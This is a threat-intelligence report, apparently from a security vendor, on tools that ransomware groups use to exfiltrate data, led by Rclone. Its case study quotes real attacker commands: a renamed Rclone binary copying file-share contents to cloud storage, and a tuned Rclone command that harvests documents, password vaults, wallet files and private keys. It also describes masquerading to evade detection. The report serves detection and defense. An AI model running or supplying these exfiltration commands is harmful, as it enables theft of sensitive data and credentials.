Key Points

  • Rclone has emerged as one of the most frequently used data-exfiltration tools observed by ReliaQuest. Its popularity among threat actors is attributed to its capability to manage extensive data transfers and its compatibility with various cloud storage solutions.
  • ReliaQuest responded to a double extortion attack where Rclone was used for data exfiltration. In this incident, the threat actors masqueraded their Rclone binary to evade static detection and successfully exfiltrated data to Dropbox.
  • In addition to Rclone, WinSCP and cURL have also been frequently utilized by threat actors for data exfiltration. These tools are often chosen due to their trusted reputations and robust automation capabilities, enabling them to conduct stealthy and efficient data-exfiltration operations.
  • Organizations should enhance their security posture by restricting access to commonly abused commercial services, ensuring comprehensive logging and visibility, and using canary files to detect and respond rapidly to potential data exfiltration.

Examining data from September 2023 to July 2024, this report provides a comprehensive analysis of the most prevalent exfiltration tools used by adversaries in data theft incidents investigated by ReliaQuest. We aim to examine frequently used tools that organizations must be aware of, as well as emerging or less common tools that also require attention. Notable tools identified by ReliaQuest include Rclone (which appeared in 57% of incidents), WinSCP, and Client URL (cURL), which have been leveraged by high-profile threat groups like LockBit, Black Basta, and Blacksuit for their versatility and ability to blend into normal operations. Atypical tools consisted of MegaSync, Restic, FileZilla, and remote monitoring and management software (RMM), which have been leveraged by threat groups like Inc Ransom. This report also provides recommendations and best practices to mitigate data exfiltration.

Understanding Exfiltration

Data exfiltration is the unauthorized transfer or retrieval of data from enterprise or personal devices. It occurs when data is moved from its legitimate location, typically within a corporate environment, to a location controlled by an attacker. This may include threat actor–owned infrastructure or third-party cloud services.

Data exfiltration occurs after an attacker has progressed through the earlier stages of the cyber kill chain. These stages include gaining initial access to a target organization, executing a malicious payload, establishing persistence, and initiating command and control channels. The attacker then performs internal discovery and lateral movement to locate valuable data. Once key information has been identified, the attacker begins exfiltrating data out of the target organization. When the data-exfiltration phase has completed, the adversary may deploy a ransomware payload, encrypting target devices. Given this attack sequence, if an organization is responding to a ransomware incident, it is likely that data exfiltration has already taken place.

Data is exfiltrated primarily for financial gain or espionage. Financially motivated threat actors often employ the “double extortion” technique—exfiltrating sensitive data before encrypting systems and threatening to release the stolen information unless a ransom is paid. Attackers may also sell stolen data, such as personally identifiable information (PII) and intellectual property, on the dark web. Insider threats, including disgruntled employees or contractors with access to sensitive information, can intentionally leak or sell data to external parties for financial gain, either willingly or under coercion from threat actors.

Nation-state–associated threat actors conduct espionage campaigns to steal trade secrets, proprietary technology, strategic plans, or sensitive government information. The objective of these campaigns is to give competitors a strategic advantage or provide nation-states with critical intelligence to influence geopolitical strategies.

In Q2 2024, ReliaQuest identified that organizations in the US, the UK, Canada, and Germany across the manufacturing, professional, scientific, and technical services (PSTS) and construction sectors have been targeted by double-extortion attacks. The US was overwhelmingly the most targeted country, possibly because it leads the market for cyber insurance, driven by government regulation and strict compliance requirements. Consequently, threat actors might perceive US-based organizations as more capable of affording ransomware payments. Threat actors have targeted PSTS and manufacturing industries due to the high impact potential, which would put further pressure on organizations and increase the chances of ransomware payment. Impacting PSTS organizations could also provide a stepping stone into additional organizations, as this sector includes technology companies it increases the chance of supply-chain attacks, possibly leading to data leakage from organizations that do not own an exploited technology (as observed in the “Clop” ransomware group’s MoveIT campaign). In the manufacturing and construction sectors, the close interdependence of IT and operational technology (OT) can lead to considerable productivity losses when the organization is impacted, again increasing the chances of ransom payments.

Double-extortion or data-extortion attacks result in a multitude of risks that go beyond the immediate ransom payments. These risks include regulatory challenges, loss of customer trust, competitive disadvantages, financial losses, the potential for continued or returning attacks, and potential downstream attacks targeting customers or partner organizations. Regulatory violations can lead to severe fines and legal repercussions, while damaging the company’s reputation and leading to potential customer churn. Competitors may gain from incidents such as this, by obtaining access to stolen intellectual property or gaining new clientele within the sector as a result. The more immediate financial loss organizations face is due to operational disruption, which would be followed by heightened insurance premiums.

Common Data-Exfiltration Tools

ReliaQuest investigations identified that tools such as Rclone, WinSCP, and cURL have been popular choices to exfiltrate data since September 2023.

Rclone

Rclone is currently the most popular exfiltration tool used by threat actors, appearing in handled by ReliaQuest in between September 2023 to July 2024. Rclone is an open-source command-line utility that allows users to synchronize files with various cloud storage providers and established infrastructure, such as a file transfer protocol (FTP) servers. While Rclone is commonly used for legitimate purposes within organizations, such as maintaining backups, it is also favoured by threat actors for several reasons.

Threat actors prefer Rclone due to its fast data-transfer capabilities and versatility. Rclone can integrate with numerous cloud services, including Google Drive, Amazon S3, and Mega, along with protocols like FTP, which complicates mitigation strategies for defenders. Organizations often use multiple cloud storage services, to meet different operational requirements or as a result of acquisitions, making it challenging for security teams to implement adequate mitigation measures. Rclone runs on Windows, Linux, and macOS, and can easily automate operations, making it very efficient for large data transfers. Its legitimacy as a backup tool used by IT professionals aids threat actors in avoiding detection or raising alarm.

WinSCP

WinSCP is an open-source file-transfer utility for Windows that offers similar functionalities to Rclone but distinguishes itself with its user-friendly interface. While WinSCP focuses on transfers from local to remote locations, Rclone is a command-line tool designed for managing files across various cloud storage services.

WinSCP is widely used within organizations and is a trusted, legitimate tool, which reduces suspicion when found on an endpoint. Its portability and scripting capabilities facilitate efficient data transfers, which could be automated or manual. Additionally, WinSCP’s effective error handling and logging features ensure the successful exfiltration of specified data.

cURL

cURL is a command-line tool used to transfer data by specifying the destination through a URL. cURL supports protocols such as HTTPS, FTP, and SFTP and is commonly used for tasks like downloading or uploading data and interacting with web services. It is cross-platform, available on Windows, macOS, and Linux. cURL is also native to Windows 10 version 1803 and later, which means threat actors do not need to ingress cURL into a target environment, allowing them to “live off the land.”

Compared to Rclone and WinSCP, cURL is not as reliable for large-scale data-exfiltration operations. However, it can serve as a very effective tool for exfiltrating key information about a target organization. In May 2024, ReliaQuest observed the Black Basta ransomware group leveraging cURL in conjunction with the cloud storage domain temp[.]sh to successfully exfiltrate sensitive data from an organization.

Atypical Tools for Data Exfiltration

Organizations should also remain vigilant about less commonly used, yet still impactful, data-exfiltration tools that can facilitate large- and small-scale data-exfiltration operations. To help mitigate the risk of data exfiltration via threat actors or insider threats, it is essential to understand the diverse techniques leveraged in the exfiltration tactic. Given the complexity of these techniques, knowledge of both historical and potential tools used for data exfiltration is essential. ReliaQuest has identified several tools that, although not as frequently observed as others, have been utilized in past incidents and continue to re-emerge every now and again. It is important to also consider tools capable of exfiltrating small amounts of data and the persistent threat of custom exfiltration tools.

MEGA Cloud Storage

MEGA is a cloud storage and synchronization solution that allows end users to store and synchronize files across all devices in cloud storage. It provides 20GB of free storage and is cross-platform, running on Windows, macOS, Linux, Android, and iOS. End users can access MEGA cloud storage via the MegaSync application, web client, MEGA CMD, and MEGA API. Threat actors leverage MEGA cloud storage for data exfiltration because it is a trusted and legitimate service, which helps them operate under the radar and bypass standard network defenses. By using MEGA’s API, adversaries can easily automate the data-exfiltration process. With the ample storage and bandwidth MEGA provides, attackers can conduct large data transfers. Using compromised personal email accounts or disposable email accounts to sign up for MEGA, threat actors can maintain anonymity. The cross-platform support ensures successful data exfiltration from various operating systems. MEGA cloud storage can also be used with Rclone, the top exfiltration tool observed by ReliaQuest.

Restic

Restic is an open-source, fast, and secure backup program designed to be easy to use. Like Rclone, it can integrate with various cloud storage services, including Google Drive and AWS S3, as well as local and external storage devices. This versatility makes Restic a notable threat in terms of exfiltration and makes it more difficult for organizations to mitigate against.

FileZilla

Although uncommon, FileZilla is not a surprising tool choice for data exfiltration. FileZilla is a widely used, open-source FTP client and server software that allows file transfers between local devices and remote servers. Like WinSCP, it provides a user-friendly GUI, supports protocols such as SFTP, and is available on Windows, Linux, and macOS. It is commonly used for backup and website management.

Remote Monitoring Management Software

RMM tools allow managed service providers (MSPs) and IT teams to remotely manage, monitor, and maintain an organization’s infrastructure. These tools have become a staple in threat actors’ arsenals because they are legitimate, trusted, and widely used. This allows threat actors to blend in with normal operations, evade detection, and maintain persistence. RMM tools can transfer data from a remote device to a local device with ease. Data-exfiltration operations leveraging RMM tools are typically smaller in scale, with the goals likely being to remain undetected for long periods of time. Performing large-scale data exfiltration using RMM tooling comes with some concerns, such as slow transfer speeds, error handling, and session stability issues.

Advanced Persistent Threats: Custom Tools

Advanced persistent threat (APT) groups typically leverage custom tools specifically designed for their operations on target organizations to better evade detection and to enhance data-exfiltration operations. By using bespoke tools, APTs can remain undetected and maintain access to a compromised organization.

One notable example is “APT35” (aka “Charming Kitten”), an Iranian state-associated cyber-espionage group that conducts long-term, resource-intensive campaigns primarily targeting American, European, and Middle Eastern government, defense, and critical infrastructure organizations. APT35 has previously used its own custom tool, “HYPERSCRAPE,” to extract data from Microsoft Outlook accounts, Gmail, and Yahoo using valid credentials.

Case Study: Rclone in Double-Extortion Attack

In September 2023, ReliaQuest detected suspicious process executions originating from the Windows debug directory in a customer environment. Investigation revealed these events were part of a larger cyber-threat incident culminating in a double-extortion attack. Due to the “flat network,” the threat actors were able to traverse throughout the environment with ease. The lack of centralized logging left the organization blind to the threat actors’ actions, and insufficient controls on cloud storage services allowed the attackers to successfully exfiltrate highly sensitive data.

The impacted organization would have benefited from network segmentation to limit lateral movement of the threat actors and simplify containment. Centralized logging across all devices would have provided correlation rules to detect this attack earlier and allowed security teams to respond to and contain the threat. Stringent controls around cloud storage services, such as blocking unauthorized or known abused cloud storage domains could have helped prevent data exfiltration. Lastly, enforcing application and binary control measures would have prevented the unauthorized process executions.

In this encounter with Rclone, ReliaQuest observed the threat actor using the masquerading technique Match Legitimate Name or Location, a method ReliaQuest had not seen before in relation to Rclone. In most Rclone incidents ReliaQuest responds to, attackers do not masquerade their Rclone binary, leaving it unchanged. However, in this instance, the adversary renamed the Rclone binary to “firefox.exe,” allowing them to bypass static detections and execute the following commands, which exfiltrated data from the specified shares to Dropbox.

c:\windows\debug\firefox.exe copy \[File-Server]A$[SensitiveData1 storagesite:ExfiltratedDataFolder]

c:\windows\debug\firefox.exe copy \[File-Server]B$[SensitiveData1 storagesite:ExfiltratedDataFolder]

Notably, prior to the execution of these commands, we observed the following incorrect command being passed, which suggests hands-on-keyboard activity rather than automated data exfiltration.

c:\windows\debug\firefox.exe copy \[File-Server]A$[SensitiveData1 ExfiltratedDataFolder]

These commands also deviated from ReliaQuest’s previous encounters with Rclone. In this instance, the threat actor exfiltrated all data held on the specified shares without using multi-threading streams, bandwidth specification, file age, file deduplication, or file extension specification. Typically, we see threat actors leveraging these Rclone functions to facilitate faster and more targeted data exfiltration. For comparison, the following Rclone command was executed by threat actors in another incident handled by ReliaQuest.

rclone.exe  copy --max-age 2y “\[File-Server]C$Users" rclone:storagesite/Users -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 --bwlimit 500M --include "*.doc" --include "*.DOC" --include "*.xlsx" --include "*.XLSX" --include "*.xls" --include "*.XLS" --include "*.docx" --include "*.DOCX" --include "*.PDF" --include "*.pdf" --include "*.txt" --include "*.csv" --include "*.CSV" --include "*.kdbx" --include "*.KDBX" --include "*.crd" --include "wallet.dat" --include "*.pem" --include "*.PEM" --include "*.CNF" --include "*.cnf" --include "*.txt" -P

This Rclone command is much more specific, enabling faster and targeted exfiltration. In this instance, the adversary specified that only files modified within the last two years should be exfiltrated. Additionally, the subcommand “–ignore-existing” was used to ensure that only files not currently present on the cloud storage site or FTP server would be transferred. The threat actor used “–multi-thread-streams,” which specifies the number of threads utilized when transferring each file. By setting this to 12, Rclone will use up to 12 threads per file. This was complemented by the subcommand “–transfers,” allowing up to 12 files to be transferred simultaneously, optimizing bandwidth and system resource usage for faster transfer speeds. The use of “–bwlimit” limited the bandwidth used by Rclone to 500 MB per second, which helps avoid detection and minimize network impact. Lastly, the threat actor specified the file types of interest for exfiltration.

Identifying Indicators of Rclone

Organizations conducting threat hunts to identify indicators of the presence of Rclone should consider the following.

Ingressing Rclone

Once a threat actor has established a foothold within an environment and identified data for exfiltration, Rclone is often ingressed via command-and-control (C2) channels rather than being directly downloaded from the Rclone site. Threat actors typically preconfigure Rclone outside of the target environment, ensuring it is fully configured and ready to operate immediately upon introduction. The configuration used by an Rclone process is stored in the “rclone.conf” file, which defines the remote storage system, type of storage, credentials, and other settings needed to connect to the remote storage system. The information contained within Rclone configuration files can vary depending on the type of storage used.

Figure 1: Example of an “Rclone.conf” file

Incident responders can gather valuable insights from these configuration files if they are left behind by the threat actor, such as the type of drive used and the account used to connect to the drive, provided the native configuration file encryption function is not used. By monitoring file modifications for the files “rclone.exe” and “rclone.conf,” incident responders can respond to and halt data exfiltration.

Binary Information

In the double-extortion attack ReliaQuest responded to, we observed the threat actor masquerading to bypass static detections. In this instance, the attacker changed the file name “rclone.exe” to “firefox.exe” and stripped all binary information before introducing it into the environment. In the event the threat actor did not remove the binary information and had just changed the file name, the below information such as the original file name would have been present.

Figure 2: Example of “Rclone binary information

Organizations should aim to identify instances where the original file name is “rclone.exe” but the current executing process name is not “rclone.exe.” This approach will allow defenders to identify masquerading Rclone processes.

Understanding How Rclone operates  

It is crucial to understand how Rclone operates to identify indicators of its presence. The table below illustrates the various Rclone options available for copying, moving, or continuously updating data on a remote storage system.

Option Description
copy Copy files from source to destination, skipping identical files.
move Move files from source to destination.
mount Mount the remote as file system on a mount point.
sync Make source and destination identical, modifying destination only.
copyto Copy files from source to destination, skipping identical files.
moveto Move file or directory from source to destination.

ReliaQuest has noted that threat actors predominantly use the “copy” option in the overwhelming majority of cases, as demonstrated in the following commands from the Rclone case study. Threat Hunters should also be aware of what cloud storage services are readily accessible to Rclone.

c:\windows\debug\firefox.exe copy \\[File-Server]\A$\[SensitiveData1 storagesite:ExfiltratedDataFolder]

rclone.exe  copy --max-age 2y “\\[File-Server]\C$\Users" rclone:storagesite/Users -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 --bwlimit 500M --include "*.doc" --include "*.DOC" --include "*.xlsx" --include "*.XLSX" --include "*.xls" --include "*.XLS" --include "*.docx" --include "*.DOCX" --include "*.PDF" --include "*.pdf" --include "*.txt" --include "*.csv" --include "*.CSV" --include "*.kdbx" --include "*.KDBX" --include "*.crd" --include "wallet.dat" --include "*.pem" --include "*.PEM" --include "*.CNF" --include "*.cnf" --include "*.txt" -P

Threat actors can easily rename and manipulate the binary information of Rclone using various open-source tools, such as Resource Hacker. Such actions result in what appears to be a benign or common file within the environment. To identify such behavior, organizations can focus on detecting unsigned files, as Rclone’s binary is never signed, making network connections to cloud storage domains commonly used by Rclone, or connections involving the Rclone command line options for copying, moving, or continuously updating data. These can provide valuable indicators of Rclone usage.

Threat Forecast

We predict, with high confidence, that Rclone will remain the top exfiltration tool used by threat actors throughout the remainder of 2024 and beyond. Rclone out of all the tools discussed in this report is the easiest to use, making for quick configuration and fast, reliable, and error-free data-exfiltration operations. It is the most versatile, integrating with various cloud storage services and external storage infrastructure. It can be configured outside the target environment, then dropped into the target environment and be readily available for execution. Based on these characteristics we expect that Rclone will continue to be the most frequently used exfiltration tool.

However, it is important to note that we do not expect the complete obsolescence of the other tools mentioned in this report from the threat landscape. The adaptation of RMM tooling for large data-exfiltration operations is yet to be seen. Although the risk of small data-exfiltration operations remains. Custom tooling used for data exfiltration will always be a lingering and difficult-to-identify threat.

What ReliaQuest Is Doing

To identify and respond to data exfiltration, ReliaQuest offers detection rules, Hunt packages within GreyMatter, and respond plays to customers. These rules alert defenders to potential data-exfiltration tool use or data exfiltration. To remediate such activity, associated GreyMatter respond plays can be executed by ReliaQuest customers or by the ReliaQuest team on a customer’s behalf. Respond plays can also be set to automatically run when detection rules are violated. GreyMatter automated respond plays (ARPs) greatly aid in responding to a threat in real time. ReliaQuest customers can make use of the preconfigured GreyMatter Hunt “Exfiltration Tools” to identify tools that can be used to exfiltrate data.

Recommendations and Best Practices

ReliaQuest recommends the following measures to prevent or reduce the impact of data-exfiltration attempts.

  • Application control: Organizations should enforce application controls through Group Policy Objects (GPOs) or other means to prevent the execution of unauthorized applications, including those capable of exfiltrating data.
  • Restricting access to abused commercial services: Threat actors frequently exploit commercial services to appear legitimate and blend into the target environment, bypassing reputation-based controls. In most of the incidents ReliaQuest responded to, threat actors used widely available services like MEGA cloud storage and Dropbox for data exfiltration. Organizations should identify the services in use and implement corresponding restrictions, such as categorical restrictions on their proxy or DNS and limitations on RMM software via application control.
  • Logging and visibility: Security teams can only act on what they can see within their environment. It is crucial to ensure critical infrastructure, and the broader environment, are forwarding activity logs to a centralized location. This logging and visibility allow security teams to implement correlation-based detection rules, investigate threats, and rapidly respond to and contain incidents resulting from exfiltration tools.
  • Use of canary files: Canary files or folders serve as decoys placed within an environment to detect unauthorized operations. These files or folders are presented as valuable and act as traps for threat actors. Implementation of canary files allows security teams to establish rules to detect modifications and respond rapidly, reducing potential damage from an exfiltration attempt.
  • Implement data loss prevention (DLP) tools: Organizations should deploy DLP tools to identify, classify, and monitor sensitive data to protect against unauthorized access. DLP tools can integrate with directory services and apply role-based access controls, enabling the creation of custom policies for specific user groups.